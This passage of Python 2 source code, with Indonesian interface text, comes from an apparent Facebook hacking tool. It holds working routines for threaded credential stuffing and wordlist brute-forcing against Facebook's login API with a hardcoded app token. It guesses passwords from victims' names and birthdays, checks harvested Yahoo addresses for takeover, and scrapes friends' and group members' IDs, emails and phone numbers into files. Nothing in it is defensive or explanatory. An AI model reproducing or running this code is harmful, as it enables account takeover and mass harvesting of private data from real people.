for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if cuih == '':
        print '\x1b[1;91m[!] Jangan kosong'
        grab_pilih()
    elif cuih == '1':
        id_teman()
    elif cuih == '2':
        idfrom_teman()
    elif cuih == '3':
        id_member_grup()
    elif cuih == '4':
        email()
    elif cuih == '5':
        emailfrom_teman()
    elif cuih == '6':
        nomor_hp()
    elif cuih == '7':
        hpfrom_teman()
    elif cuih == '0':
        menu_hack()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
        grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
